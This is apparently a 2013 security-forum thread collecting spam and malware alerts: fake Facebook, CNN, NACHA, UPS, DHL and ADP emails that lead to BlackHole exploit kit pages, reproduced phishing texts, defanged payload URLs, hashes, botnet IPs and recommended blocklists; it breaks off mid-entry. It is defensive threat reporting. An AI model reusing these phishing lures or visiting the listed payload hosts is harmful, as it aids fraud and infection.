The malicious payload is at [donotclick]hiskintako .ru:8080/forum/links/column.php (report here*) hosted on:
50.22.0.2 (SoftLayer, US)
89.110.131.10 (Netclusive, Germany)
132.230.75.95 (Albert-Ludwigs-Universitaet, Germany)
188.165.202.204 (OVH, France)
BLOCKLIST:
50.22.0.2
89.110.131.10
132.230.75.95
188.165.202.204
forumla .ru
gimiiiank .ru
giminanvok .ru
giminkfjol .ru
giminaaaao .ru
giimiiifo .ru
giliaonso .ru
forumny .ru
hiskintako .ru
gxnaika .ru
gulivaerinf .ru "
* http://urlquery.net/report.php?id=1516090
... Detected live BlackHole v2.0 exploit kit 50.22.0.2
___
Squeak Data / squeakdata .com SPAM
- http://blog.dynamoo.com/2013/03/squeak-data-squeakdatacom-spam.html
19 March 2013 - "... The email address they are sending to has been harvested, so you can be pretty sure that the mailing lists they sell are of very low quality. But there's a bit more to this spam than meets the eye..
From: Squeak Data [enquiries @squeakdata .com] via smtpguru .net
Date: 19 March 2013 13:35
Subject: Squeak Data
Signed by: smtpguru .net
Squeak Data - Qualified & Opted In Prospect Data
- At a fraction of the usual price. We own all the data we sell so we can keep our prices extremely competitive but still deliver on quality and service.
New January 2013 Opted In Business Database - contains over 437k records. This data set is completely new and unique to us. It has been strictly opted in at decision maker level. It contains SME businesses throughout the UK. Every record contains full information fields including a live and valid email address.
We are aware that much larger business databases are currently been offered. It takes a lot of hard work and man hours to produce a truly opted in and quality prospect list. Common sense must prevail and conclude that such large databases cannot possibly be opted in and are very old and tired.
We do not hold old and tired data. Our data is fresh, unique and will help you accomplish your new business targets.
Our data is sold with a 95% email delivery promise and on a multiple use basis...
The domain was registered on 2nd March, so it's only a few days old. But that email address looks familiar.. yes, this is Toucan UK who said last year that they were closing down their business. It turns out that this is a lie too. A brief bit of Googling also brings up this other spam where they are saying pretty much the same thing. It looks like they used to have a Twitter handle of @MoneyTreesData although that appears to have been nuked. Oh well.
Give these spammers a wide berth."
___
Fake Facebook SPAM / heelicotper .ru
- http://blog.dynamoo.com/2013/03/facebook-spam-heelicotperru.html
19 Mar 2013 - "This fake Facebook spam leads to malware on heelicotper .ru:
Date: Tue, 19 Mar 2013 08:37:37 +0200
From: Facebook [updateSIXQG03I44AX @facebookmail .com]
Subject: You have notifications pending
facebook
Hi,
Here's some activity you may have missed on Facebook.
TAMISHA Gore has posted statuses, photos and more on Facebook.
Go To Facebook
See All Notifications
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future or have your email address used for friend suggestions, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
The malicious payload is at [donotclick]heelicotper .ru:8080/forum/links/column.php which isn't resolving at the moment, but was earlier hosted on:
50.22.0.2 (SoftLayer, US)
132.230.75.95 (Albert-Ludwigs-Universitaet, Germany)
188.165.202.204 (OVH, France)
The payload and associated IPs are the same as in this attack."
___
Malware spam: Cyprus banks...CNN.com / salespeoplerelaunch .org
- http://blog.dynamoo.com/2013/03/malware-spam-opinion-cyprus-banks-shut.html
19 Mar 2013 - "This topically themed (but fake) CNN spam leads to malware on salespeoplerelaunch .org:
Date: Tue, 19 Mar 2013 10:40:22 -0600
From: "CNN Breaking News" [BreakingNews@mail.cnn.com]
Subject: Opinion: Cyprus banks shut extended to Monday - CNN.com
Powered by
* Please note, the sender's email address has not been verified.
You have received the following link from BreakingNews @mail.cnn .com:
Click the following to access the sent link:
Cyprus banks shut extended to Monday - CNN.com*
Get your EMAIL THIS Browser Button and use it to email content from any Web site. Click here for more information.
*This article can also be accessed if you copy and paste the entire address below into your web browser.
by clicking here
The malicious payload is at [donotclick]salespeoplerelaunch .org/close/printed_throwing-interpreting-dedicated.php (report here) hosted on 69.197.177.16 (WholeSale Internet, US).
Nameservers are NS1.DNSLVLUP.COM (5.9.212.43, Hetzner / Dolorem Ipsum Management Ltd, Germany) and NS2.DNSLVLUP.COM (66.85.131.123, Secured Servers LLC / Phoenix NAP, US)
Recommended blocklist:
salespeoplerelaunch .org
dnslvlup .com
69.197.177.16
5.9.212.43
66.85.131.123"
Scam of the day: More fake CNN e-mails
- https://isc.sans.edu/diary.html?storyid=15436
Last Updated: 2013-03-19 17:37:08 UTC
> https://isc.sans.edu/diaryimages/images/cnncyprus.png
> http://wepawet.iseclab.org/view.php?hash=dbeb07e4d46aa4cbd38617a925499c22&type=js
:mad:
AplusWebMaster
2013-03-20, 14:09
FYI...
Fake USPS SPAM / himalayaori .ru
- http://blog.dynamoo.com/2013/03/usps-spam-himalayaoriru.html
20 March 2013 - "This -fake- UPS (or is it USPS?) spam leads to malware on himalayaori .ru. The malicious link is in an attachment called ATT17235668.htm. For some reason the only sample of the spam that I have is horribly mangled:
From: HamzaRowson @hotmail .com [mailto:HamzaRowson @hotmail .com]
Sent: 19 March 2013 23:40
Subject: United Postal Service Tracking Number H1338091657
Your USPS TEAM for big savings!
Can't see images? CLICK HERE.
UPS UPS SUPPORT 56 Not Ready to Open an Account? The UPS Store® can help with full service packing and shipping.
Learn More >> UPS - Your UPS Team
Good day, [redacted].
Dear User , Delivery Confirmation: Failed
Track your Shipment now!
With best regards , Your UPS Customer Services. Shipping Tracking Calculate Time & Cost
Open an Account @ 2011 United Parcel Service of America, Inc. USPS Team, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
This is a marketing e-mail for UPS services. Click here to update your e-mail preferences or to unsubscribe to USPS .us Customer Services marketing e-mail For information on UPS's privacy practices, please refer to UPS Privacy Policy. Your USPS .US, 5 Glenlake Parkway, NE - Atlanta, GA 30325
Attn: Customer Communications Department
Clicking on the attachment sends the intended victim to a malicious web page at [donotclick]himalayaori .ru:8080/forum/links/column.php (report here*), in this case via a legitimate hacked site at [donotlick]www.unisgolf .ch/report.htm but that is less important. himalayaori .ru is hosted on a couple of IPs that look familiar:
50.22.0.2 (SoftLayer, US)
188.165.202.204 (OVH, France)
Recommended blocklist:
50.22.0.2
188.165.202.204
himalayaori .ru
hentaimusika .ru
hiskintako .ru
gxnaika .ru
forumla .ru
gulivaerinf .ru
foruminanki.ru
forumny .ru ..."
* http://urlquery.net/report.php?id=1525298
___
Fake Invoice SPAM / hifnsiiip .ru
- http://blog.dynamoo.com/2013/03/end-of-aug-statement-spam-hifnsiiipru.html
20 Mar 2013 - "This fake invoice spam leads to malware on hifnsiiip .ru:
Date: Wed, 20 Mar 2013 05:41:44 +0100
From: LinkedIn Connections [connections @linkedin .com]
Subject: Re: FW: End of Aug. Statement
Attachments: Invoices-AS9927.htm
Good morning,
as reqeusted I give you inovices issued to you per dec. 2012 ( Internet Explorer file)
Regards
The attached Invoices-AS9927.htm file attempts to direct the victim to a malicious landing page [donotclick]hifnsiiip .ru:8080/forum/links/column.php (report here*) hosted on:
50.22.0.2 (SoftLayer, US)
109.230.229.156 (High Quality Server, Germany)
188.165.202.204 (OVH, France)
Recommended blocklist:
50.22.0.2
109.230.229.156
188.165.202.204..."
(More at the dynamooo URL above.)
* http://urlquery.net/report.php?id=1526708
... Detected suspicious URL pattern... Blackhole 2 Landing Page 188.165.202.204
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake FedEx Parcel Delivery Failure Notification E-mail Messages - 2013 Mar 20
Fake Electronic Payment Cancellation E-mail Messages - 2013 Mar 20
Fake Payment Transaction Notice E-mail Messages - 2013 Mar 19
Fake Wire Transfer Notification E-mail Messages - 2013 Mar 19
Fake Document Attachment E-mail Message - 2013 Mar 19
Fake CashPro Online Digital Certificate Notification E-mail Messages - 2013 Mar 18
Fake Order And Transfer Slip Notification E-mail Messages - 2013 Mar 18
Fake Payment Processing Notice E-mail Messages - 2013 Mar 18
Fake Purchase Order Payment Notification E-mail Messages - 2013 Mar 18
Fake Product Order E-mail Messages - 2013 Mar 18
Fake Online Purchase Receipt E-mail Messages - 2013 Mar 18
(More detail and links at the cisco URL above.)
:fear::mad:
AplusWebMaster
2013-03-21, 18:06
FYI...
Fake NACHA SPAM / encodeshole .org
- http://blog.dynamoo.com/2013/03/nacha-spam.html
21 March 2013 - "This fake NACHA spam leads to malware on encodeshole .org:
From: "Тимур.Родионов @direct.nacha .org" [mailto:biker @wmuttkecompany .com]
Sent: 20 March 2013 18:51
Subject: Payment ID 454806207096 rejected
Importance: High
Dear Sirs,
Herewith we are informing you, that your latest Direct Deposit payment (ID431989197078) was cancelled,due to your current Direct Deposit software being out of date. Please use the link below to enter the secure section of our web site and see the details::
Click here for more information
Please apply to your financial institution to get the necessary updates of the Direct Deposit software.
Best regards,
ACH Network Rules Department
NACHA - The Electronic Payments Association
10933 Sunrise Valley Drive, Suite 771
Herndon, VA 20190
Phone: 703-561-0849 Fax: 703-787-0548
The malicious payload is at [donotclick]encodeshole.org/closest/209tuj2dsljdglsgjwrigslgkjskga.php (report here) hosted on 91.234.33.187 (FOP Sedinkin Olexandr Valeriyovuch, Ukraine). The following suspect domains are on the same IP:
91.234.33.187
encodeshole .org
rotariesnotify .org
rigidembraces .info
storeboughtmodelers .info
* http://urlquery.net/report.php?id=1536940
... Detected BlackHole v2.0 exploit kit URL pattern... Detected live BlackHole v2.0 exploit kit 91.234.33.187
- https://www.google.com/safebrowsing/diagnostic?site=AS:56485
"... over the past 90 days, 54 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-03-21, and the last time suspicious content was found was on 2013-03-21... Over the past 90 days, we found 8 site(s) on this network... that appeared to function as intermediaries for the infection of 23 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 13 site(s)... that infected 30 other site(s)..."
___
Fake ScanJet SPAM / hillaryklinton .ru
- http://blog.dynamoo.com/2013/03/scan-from-hewlett-packard-scanjet-spam_21.html
21 March 2013 - "This fake printer spam leads to malware on the amusingly-named hillaryklinton .ru:
From: messages-noreply@bounce .linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of LinkedIn Password
Sent: 21 March 2013 06:56
Subject: Scan from a Hewlett-Packard ScanJet #269644
Attached document was scanned and sent
to you using a Hewlett-Packard HP Officejet 6209P.
Sent by: SANDIE
Images : 1
Attachment Type: .HTM [INTERNET EXPLORER]
Hewlett-Packard Officejet Location: machine location not set
In this case there is an attachment called Scanned_Document.htm which leads to a malicious payload at [donotclick]hillaryklinton .ru:8080/forum/links/column.php (report here*) hosted on:
50.22.0.2 (SoftLayer, US)
62.75.157.196 (Inergenia, Germany)
109.230.229.156 (High Quality Server, Germany)
Blocklist:
50.22.0.2
62.75.157.196
109.230.229.156
foruminanki .ru
forumla .ru
forumny .ru
gulivaerinf .ru
gxnaika .ru
hanofk .ru
heelicotper .ru
hifnsiiip .ru
hillaryklinton .ru
himalayaori .ru
humalinaoo .ru
* http://urlquery.net/report.php?id=1535161
... Detected suspicious URL pattern... Blackhole 2 Landing Page 109.230.229.156
___
Fake CNN emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/03/21/fake-cnn-breaking-news-alerts-themed-emails-lead-to-black-hole-exploit-kit/?
March 21, 2013 - "... thousands of malicious ‘CNN Breaking News’ themed emails... exploit-serving and malware-dropping links found within. Once users click on any of the links found in the bogus emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/fake_email_spam_cnn_breaking_news_alerts_exploits_malware_social_engineering_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
webpageparking .net – 109.74.61.59; 24.111.157.113; 58.26.233.175; 155.239.247.247...
Responding to 24.111.157.113 ... malicious domains...
Upon successful clienet-side exploitation, the campaign drops MD5: 24d406ef41e9a4bc558e22bde0917cc5 * ... Worm:Win32/Cridex.E...
* https://www.virustotal.com/en/file/3e40e6903716e0a59a898242161c55c2ca100e539a665a8634e101346ce289be/analysis/
File name: deskadp.dll
Detection ratio: 23/45
Analysis date: 2013-03-21 10:46
___
Fake "Data Processing Service" spam / airtrantran .com
- http://blog.dynamoo.com/2013/03/data-processing-service-spam.html
21 Mar 2013 - "This spam leads to malware on airtrantran .com
Date: Thu, 21 Mar 2013 15:55:22 +0000 [11:55:22 EDT]
From: Data Processing Service [customerservice @dataprocessingservice .com]
Subject: ACH file ID "973.995" has been processed successfully
Files Processing Service
SUCCESS Notification
We have successfully complete ACH file 'ACH2013-03-20-8.txt' (id '973.995') submitted by user '[redacted]' on '2013-03-20 23:24:14.9'.
FILE SUMMARY:
Item count: 21
Total debits: $17,903.59
Total credits: $17,903.59
For addidional info review it here
24.111.157.113 (Midcontinent Media, US)
58.26.233.175 (TMnet, Malaysia)
109.74.61.59 (Ace Telecom, Hungary)
155.239.247.247 (Centurion Telkom, South Africa)
Blocklist:
24.111.157.113
58.26.233.175
109.74.61.59
155.239.247.247 ..."
___
Fake Facebook SPAM / scriptuserreported .org
- http://blog.dynamoo.com/2013/03/facebook-spam-scriptuserreportedorg.html
21 Mar 2013 - "This Facebook spam has undergone some sort of failure during construction, revealing some of the secrets of how these messages are constructed. It leads to malware on scriptuserreported .org:
Date: Thu, 21 Mar 2013 10:56:28 -0500
From: Facebook [update+oi=MKW63Z @facebookmail .com]
Subject: John Jenkins commented photo of you.
facebook
John Jenkins commented on {l5}.
reply to this email to comment on this photo.
see comment
this message was sent to {mailto_username}@{mailto_domain}. if you don't want to receive these emails from facebook in the future, please unsubscribe.
facebook, inc., attention: department 415, po box 1000{digit}, palo alto, ca 9{digit}3{digit}
The malicious payload is at [donotclick]scriptuserreported .org/close/keys-importance-mention.php hosted on 5.39.37.31 and there are no surprises that this is OVH in France.. but wait a minute because this is in a little suballocated block thusly:
inetnum: 5.39.37.24 - 5.39.37.31
netname: n2p3DoHost
descr: DoHost n2 p3
country: FR ...
Let's start with the server at 5.39.37.31 which is distributing the Blackhole Exploit Kit (report here*). This server also hosts the following potentially malicious domains:
pesteringpricelinecom .net
resolveconsolidate .net
scriptuserreported .org
provingmoa .com
Go back a few IPs to 5.39.37.28 and there is are a couple of work-at-home scam sites:
workhomeheres01 .com
workhomeheres02 .com
There's also a work-at-home scam on 5.39.37.24:
makeworkhome12 .pl
5.39.37.26 appears to be hosting a control panel for the Neutrino Exploit kit:
myadminspanels .info
supermyadminspanels .info
So you can pretty much assume that 5.39.37.24/29 is a sewer and you should block the lot. Who is n2p3DoHost? Well, I don't know.. but there's one more clue at 5.39.37.29 which is the domain rl-host .net...
Does M. Queste own this /29? If he does, then it looks like he has some very bad customers..
Minimum blocklist:
5.39.37.31
pesteringpricelinecom .net
resolveconsolidate .net
scriptuserreported .org
provingmoa .com
Recommended blocklist:
5.39.37.24/29
makeworkhome12 .pl
myadminspanels .info
supermyadminspanels .info
workhomeheres01 .com
workhomeheres02 .com
rl-host .net
pesteringpricelinecom .net
resolveconsolidate.net
scriptuserreported .org
provingmoa .com"
* http://urlquery.net/report.php?id=1539128
... Detected live BlackHole v2.0 exploit kit 5.39.37.31
___
Fake Changelog SPAM / hillairusbomges .ru
- http://blog.dynamoo.com/2013/03/changelog-spam-hillairusbomgesru.html
21 Mar 2013 - "This fake changelog spam leads to malware on hillairusbomges .ru:
Date: Thu, 21 Mar 2013 03:01:59 -0500 [04:01:59 EDT]
From: LinkedIn Email Confirmation [emailconfirm @linkedin .com]
Subject: Re: Changelog Oct.
Good morning,
as prmised updated changelog - View
L. LOYD
The malicious payload is at [donotclick]hillairusbomges .ru:8080/forum/links/column.php (report here*) hosted on:
50.22.0.2 (Softlayer / Monday Sessions Media, US)
66.249.23.64 (Endurance International Group, US)
188.165.202.204 (OVH, France)
Blocklist:
50.22.0.2
66.249.23.64
188.165.202.204 ..."
* http://urlquery.net/report.php?id=1540852
... Detected suspicious URL pattern... Blackhole 2 Landing Page 188.165.202.204
:fear::mad:
AplusWebMaster
2013-03-22, 18:13
FYI...
Fake Zendesk SPAM / vagh .ru / pillshighest .com
- http://blog.dynamoo.com/2013/03/zendesk-important-notice-about-security.html
22 Mar 2013 - "This unusual spam leads to a fake pharma site on pillshighest .com via vagh .ru and an intermediate -hacked- site.
Date: Fri, 22 Mar 2013 13:52:08 -0700
From: Support Team [pinbot @schwegler .com]
To: [redacted]
Subject: An important notice about security
We recently learned that the vendor we use to answer support requests and other emails (Zendesk) experienced a security breach.
We're sending you this email because we received or answered a message from you using Zendesk. Unfortunately your name, email address and subject line of your message were improperly accessed during their security breach. To help keep your account secure, please:
Don't share your password. We will never send you an email asking for your password. If you get an email like this, please let us know right away.
Beware of suspicious emails. If you get any emails that look like they're from our Support Team but don't feel right, please let us know - especially if they include details about your support request.
Use a strong password. If your password is weak, you can create a new one.
We're really sorry this happened, and we'll keep working with law enforcement and our vendors to ensure your information is protected.
Support Team
Questions? See our FAQ.
This email was sent to [redacted].
�2013 Zendesk, Inc. | All Rights Reserved
Privacy Policy | Terms and Conditions
There appears to be no malware involved in this attack. After the user has clicked through to the -hacked- site (in this case [donotclick]www.2001hockey .com/promo/page/ - report here*) the victim is -bounced- to [donotclick]vagh .ru on 193.105.210.212 (FOP Budko Dmutro Pavlovuch, Ukraine**) and then on to [donotclick]pillshighest .com on 91.217.53.30 (Fanjcom, Czech Republic).
Some IPs and domains you might want to block:
91.217.53.30
193.105.210.212 ..."
(More listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1547240
... RBN - Known Russian Business Network IP - 109.120.138.155***
** https://www.google.com/safebrowsing/diagnostic?site=AS:57954
*** https://www.google.com/safebrowsing/diagnostic?site=AS:30968
- http://nakedsecurity.sophos.com/2013/03/22/fake-zendesk-security-notice/
March 22, 2013
> https://sophosnews.files.wordpress.com/2013/03/fake-security-notice.jpg?w=640
___
Fake ACH email - malware...
- http://www.hoax-slayer.com/ach-file-processed-malware.shtml
March 22, 2013 - "Outline: Message purporting to be from the Automated Clearing House (ACH) claims that a file submitted by a user has been successfully processed and invites recipients to click a link to read more information about the large sum transactions listed....
Brief Analysis: The email is -not- from ACH and the transactions listed in the message are not genuine. The -link- in the email opens a compromised website that harbours information-stealing malware... Those who do click the link will be taken to one of several websites that harbour malware. Once downloaded, such malware can typically make connections with remote servers controlled by criminals, download and install further malware components and harvest personal and financial information from the infected computer.
Scammers have targeted the ACH and the entity's managing body NACHA for several years. Some have been malware attacks such as this one. Others have been phishing scams intent on tricking people into divulging their personal and financial information. The ACH is an official funds transfer system that processes large volumes of credit and debit transactions in the United States and this makes it an attractive target for scammers.
Neither ACH nor NACHA will ever send you an unsolicited email that asks you to open an attachment or follow a link and supply personal information. If you receive an email that claims to be from the ACH or NACHA, do not open any attachments that it may contain. Do not follow any links in the email. Do not reply to the email or supply any information to the senders."
___
Fake Wire Transfer SPAM / dataprocessingservice-alerts .com
- http://blog.dynamoo.com/2013/03/wire-transfer-spam-dataprocessingservic.html
22 Mar 2013 - "This fake Wire Transfer spam leads to malware on dataprocessingservice-alerts .com:
Date: Fri, 22 Mar 2013 10:42:22 -0600
From: support @digitalinsight .com
Subject: Terminated Wire Transfer Notification - Ref: 54133
Immediate Transfers Processing Service
STATUS Notification
The following wire transfer has been submitted for approval. Please visit this link to review the transaction details (ref '54133' submitted by user '[redacted]' ).
TRANSACTION SUMMARY:
Initiated By: [redacted]
Initiated Date & Time: 2013-03-21 4:00:46 PM PST
Reference Number: 54133
For addidional info visit this link
The payload is at [donotclick]dataprocessingservice-alerts .com/kill/chosen_wishs_refuses-limits.php (report here*) hosted on:
24.111.157.113 (Midcontinent Media, US)
58.26.233.175 (TMNet, Malaysia)
155.239.247.247 (Centurion Telkom, South Africa)
Blocklist:
24.111.157.113
58.26.233.175
155.239.247.247 ..."
* http://urlquery.net/report.php?id=1548528
... Detected live BlackHole v2.0 exploit kit 24.111.157.113
___
Fake Changelog SPAM / hohohomaza .ru
- http://blog.dynamoo.com/2013/03/changelog-spam-hohohomazaru.html
22 Mar 2013 - "Evil changelog spam episode 274, leading to malware on hohohomaza .ru. Hohoho indeed.
Date: Fri, 22 Mar 2013 11:06:48 -0430
From: Hank Sears via LinkedIn [member @linkedin .com]
Subject: Fwd: Changelog as promised (upd.)
Hello,
as promised changelog - View
L. HENDRICKS
The malware landing page is at [donotclick]hohohomaza .ru:8080/forum/links/column.php hosted on:
50.22.0.2 (Softlayer / Monday Sessions Media, US)
66.249.23.64 (Endurance International Group, US)
80.246.62.143 (Alfahosting / Host Europe, Germany)
Blocklist:
50.22.0.2
66.249.23.64
80.246.62.143 ..."
:mad::fear:
AplusWebMaster
2013-03-25, 19:14
FYI...
Fake BBC emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/03/25/malicious-bbc-daily-email-cyprus-bailout-themed-emails-lead-to-black-hole-exploit-kit/
March 25, 2013 - "Cybercriminals are currently spamvertising tens of thousands of malicious emails impersonating BBC News, in an attempt to trick users into thinking that someone has shared a Cyprus bailout themed news item with them. Once users click on any of the links found in the fake emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the fake BBC News email:
> https://webrootblog.files.wordpress.com/2013/03/fake_malicious_bbc_news_email_malware_exploits_spam_black_hole_exploit_kit_cyprus.png
... Sample client-side exploits serving URL: hxxp ://crackedserverz .com/kill/larger_emergency.php – 155.239.247.247; 109.74.61.59; 24.111.157.113; 58.26.233.175 – Email: tellecomvideo1 @gmx .us...
Upon successful client-side exploitation the campaign drops MD5: 1d4aaaf4ae7bfdb0d9936cd71ea717b2 * ...Spyware/Win32.Zbot..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/4603f908de8080fc6e5d33738225a3f4c2ae609a958819be16e782ad469f38c7/analysis/
File name: 1d4aaaf4ae7bfdb0d9936cd71ea717b2
Detection ratio: 23/45
Analysis date: 2013-03-21
- https://www.net-security.org/malware_news.php?id=2444
25.03.2013
Fake: https://www.net-security.org/images/articles/bbc-cyprus-fake-big.jpg
___
Fake Bank of America SPAM / PAYMENT RECEIPT 25-03-2013-GBK-74
- http://blog.dynamoo.com/2013/03/bank-of-america-spam-payment-receipt-25.html
25 Mar 2013 - "This spam comes with a malicious EXE file in the archive PAYMENT RECEIPT 25-03-2013-GBK-74.zip
Date: Mon, 25 Mar 2013 05:50:18 +0300 [03/24/13 22:50:18 EDT]
From: Bank of America [gaudilyl30 @gmail .com]
Subject: Your transaction is completed
Transaction is completed. $4924 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Payment receipt is attached.
*** This is an automatically generated email, please do not reply ***
Bank of America, N.A. Member FDIC. Equal Housing Lender Opens in new window
© 2013 Bank of America Corporation. All rights reserved
Opening the ZIP file leads to an EXE caled PAYMENT RECEIPT 25-03-2013-GBK-74.EXE which has a pretty patchy detection rate on VirusTotal*. Comodo CAMAS detects traffic to the domains seantit .ru and programcam .ru hosted on:
59.99.226.54 (BSNL Internet, India)
66.248.200.143 (Avante Hosting Services / Dominic Lambie, US)
77.241.198.65 (VPSnet, Lithunia)
81.20.146.229 (GONetwork, Estonia)
103.14.8.20 (Symphony Communication, Thailand)
Plain list:
59.99.226.54
66.248.200.143
77.241.198.65
81.20.146.229
103.14.8.20 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en/file/b1cd9d3eedfbca41fc97421574eb5824d47fe4e74e4742ef4f00cd5007ad755d/analysis/
File name: Loaf Harley Goals
Detection ratio: 22/46
Analysis date: 2013-03-25
___
Fake HP ScanJet SPAM / humaniopa .ru
- http://blog.dynamoo.com/2013/03/scan-from-hp-scanjet-spam-humanioparu.html
25 Mar 2013 - "This fake printer spam leads to malware on humaniopa .ru:
Date: Mon, 25 Mar 2013 03:57:54 -0500
From: LinkedIn Connections [connections @linkedin .com]
Subject: Scan from a HP ScanJet #928909620
Attachments: Scanned_Document.htm
Attached document was scanned and sent
to you using a Hewlett-Packard HP Officejet 98278P.
Sent by: CHANG
Images : 5
Attachment Type: .HTM [INTERNET EXPLORER]
Hewlett-Packard Officejet Location: machine location not set
The attachment Scanned_Document.htm leads to malware on [donotclick]humaniopa .ru:8080/forum/links/column.php (report here*) hosted on:
66.249.23.64 (Endurance International Group, US)
72.11.155.182 (OC3 Networks, US)
72.167.254.194 (GoDaddy, US)
95.211.154.196 (Leaseweb, Netherlands)
Blocklist:
66.249.23.64
72.11.155.182
72.167.254.194
95.211.154.196 ..."
* http://urlquery.net/report.php?id=1592330
... Detected suspicious URL pattern... Blackhole 2 Landing Page 95.211.154.196
___
Fake "Copies of policies" SPAM / heepsteronst .ru
- http://blog.dynamoo.com/2013/03/copies-of-policies-spam-heepsteronstru.html
25 Mar 2013 - "This spam leads to malware on heepsteronst .ru:
Date: Mon, 25 Mar 2013 06:20:54 -0500 [07:20:54 EDT]
From: Ashley Madison [donotreply @ashleymadison .com]
Subject: RE: DEBBRA - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
DEBBRA Barnard,
The malicious payload is at [donotclick]heepsteronst .ru:8080/forum/links/column.php (report here*). The IP addresses used are the same ones as used in this attack**."
* http://urlquery.net/report.php?id=1593558
... Detected suspicious URL pattern... Blackhole 2 Landing Page 72.167.254.194
** http://blog.dynamoo.com/2013/03/scan-from-hp-scanjet-spam-humanioparu.html
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Future of Digital Marketing Event Notification E-mail Message - 2013 Mar 25
Fake Product Order Shipping Documents E-mail Messages - 2013 Mar 25
Fake Online Dating Request E-mail Messages - 2013 Mar 25
Fake Product Sample Request E-mail Messages - 2013 Mar 25
Fake Product Order E-mail Message - 2013 Mar 25
Fake Quotation Request With Attached Sample Design Notification E-mail Messages - 2013 Mar 25
Fake Shipment Notification E-mail Messages - 2013 Mar 25
Fake Bank Repayment Information E-mail Messages - 2013 Mar 25
Fake Payment Transaction Notification E-mail Messages - 2013 Mar 25
(More detail and links at the cisco URL above.)
:mad::mad:
AplusWebMaster
2013-03-26, 13:49
FYI...
Fake ADP emails lead to malware
- http://blog.webroot.com/2013/03/26/adp-payroll-invoice-themed-emails-lead-to-malware/
March 26, 2013 - "Over the past week, we intercepted a massive ‘ADP Payroll Invoice” themed malicious spam campaign, enticing users into executing a malicious file attachment. Once users execute the sample, it downloads additional pieces of malware on the affected host, compromising the integrity, and violating the confidentiality of the affected PC...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/email_spam_adp_payroll_invoice_malware_social_engineering_malicious_software_downloader_botnet.png
Detection rate for the malicious attachment:
MD5: 54e9a0495fbd5c952af7507d15ebab90 * ... Trojan.Win32.FakeAV.qqdm
... Initiating the following TCP connections:
213.186.47.54 :8080
195.93.201.42 :80
216.55.186.239 :80
77.92.151.6 :80
66.118.64.208 :80 ...
Detection rates for the downloaded malware samples:
hxxp://infoshore.biz/cx5oMi.exe – MD5: 13eeca375585322c676812cf9e2e9789 ** ... Heuristic.LooksLike.Win32.Suspicious.B
hxxp://axelditter.de/w91qZ5.exe – MD5: 87c658970958bb5794354a91f8cc5a7d – detected by 18 out of 46 antivirus scanners as PWS:Win32/Zbot.gen!AM...
It then attempts multiple UDP connection attempts to the following IPs part of the botnet’s infrastructure:
109.162.153.126 :25603
81.149.242.235 :28768
88.241.148.26 :19376
78.166.167.62 :26509
88.232.36.188 :11389
80.6.67.158 :11016 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/f7988dfeb5a7cd947604074d7f5f648ecc6ffe7bff38bca71f08779f69150298/analysis/1363949422/
File name: ADP_Invoice.exe
Detection ratio: 24/46
Analysis date: 2013-03-22
** https://www.virustotal.com/en/file/8710ba76461b3627deb85aac0b0c1729c0ce58af1d77806fa1bfa3eae3de7268/analysis/1363952056/
File name: ADP_cx5oMi.exe
Detection ratio: 3/46
Analysis date: 2013-03-22
___
Fake NACHA SPAM / breathtakingundistinguished .biz
- http://blog.dynamoo.com/2013/03/nacha-spam-breathtakingundistinguishedb.html
26 March 2013 - "This fake NACHA spam leads to malware on breathtakingundistinguished .biz:
From: "Гена.Симонов@direct .nacha .org" [mailto:corruptnessljx953 @bsilogistik .com]
Sent: 25 March 2013 22:26
Subject: Re: Your Direct Deposit disallowance
Importance: High
Attn: Accounting Department
We are sorry to notify you, that your latest Direct Deposit transaction (#963417979218) was disallowed,because your business software package was out of date. The detailed information about this matter is available in the secure section of our web site:
Click here for more information
Please consult with your financial institution to acquire the updated version of the software.
Yours truly,
ACH Network Rules Department
NACHA - The Electronic Payments Association
19681 Sunrise Valley Drive, Suite 275
Herndon, VA 20135
Phone: 703-561-1796 Fax: 703-787-1698
The malicious payload is at [donotclick]breathtakingundistinguished .biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php (report here*) hosted on 62.173.138.71 (Internet-Cosmos Ltd., Russia). The following malicious sites are also hosted on the same server:
necessarytimealtering .biz
hitwiseintelligence .biz
breathtakingundistinguished .biz "
* http://urlquery.net/report.php?id=1615815
... Detected BlackHole v2.0 exploit kit URL pattern... Detected live BlackHole v2.0 exploit kit 62.173.138.71
___
Fake DHL Spam / LABEL-ID-NY26032013-GFK73.zip
- http://blog.dynamoo.com/2013/03/dhl-spam-label-id-ny26032013-gfk73zip.html
26 Mar 2013 - "This DHL-themed spam contains a malicious attachment.
Date: Tue, 26 Mar 2013 17:27:46 +0700 [06:27:46 EDT]
From: Bart Whitt - DHL regional manager [reports @dhl .com]
Subject: DHL delivery report NY20032013-GFK73
Web Version | Update preferences | Unsubscribe
DHL notification
Our company’s courier couldn’t make the delivery of parcel.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: ETBAKPRSU3
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
